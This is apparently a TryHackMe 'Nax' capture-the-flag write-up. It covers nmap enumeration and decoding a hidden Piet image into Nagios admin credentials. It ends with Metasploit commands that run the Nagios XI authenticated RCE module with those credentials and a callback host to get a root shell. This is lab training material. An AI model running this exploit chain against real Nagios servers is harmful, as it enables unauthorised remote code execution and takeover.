THM Nax writeup
After lunching the vm i started doing some enumeration, port scanning and fuzzing
# Nmap 7.80 scan initiated Sun Jun 19 16:46:08 2022 as: nmap -sC -sV -oN nmap/results -v nax.thm
Nmap scan report for nax.thm (10.10.55.121)
Host is up (0.37s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 62:1d:d9:88:01:77:0a:52:bb:59:f9:da:c1:a6:e3:cd (RSA)
|_ 256 20:28:15:ef:13:c8:9f:b8:a7:0f:50:e6:2f:3b:1e:57 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=192.168.85.153/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Issuer: commonName=192.168.85.153/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| tls-alpn:
|_ http/1.1
i found 5 ports open, but the only interesting one here is port 80 which is the webserver, i also did some fuzzing with gobuster but it didn’t find actually something useful and so i looked at the website itself
nothing interesting except those periodic table elements where if you get the atomic values of each element you will get this
47 80 73 51 84 46 80 78 103
which looks like ascii values and by using an online converter from ascii to text you will get /PI3T.PNg
which is the answer for the sercret file
by opening that image you will get this
download that image and check its exif data
exiftool PI3T.PNg
and here you will find the owner of the image
looking at the image it looks like piet programming language which decoded can show probably interesting information
i installed npiet and then ran
./npiet PI3T.ppm -e 1000
which gives nagiosadmin%n3p3UQ&9BjLp4$7uhWdY
probably user and password
after doing a small reserach i found this interesting exploit which requires user and password that we have, then start metasploit
msfconsole
Msf6> use exploit/linux/http/nagios_xi_authenticated_rce
Msf6> options
Msf6> set PASSWORD n3p3UQ&9BjLp4$7uhWdY
Msf6> set USERNAME nagiosadmin
Msf6> set RHOSTS nax.thm
Msf6> set LHOSTS YOUR_IP
Msf6> run
and after running the exploit you will get a root shell where you can get both the flags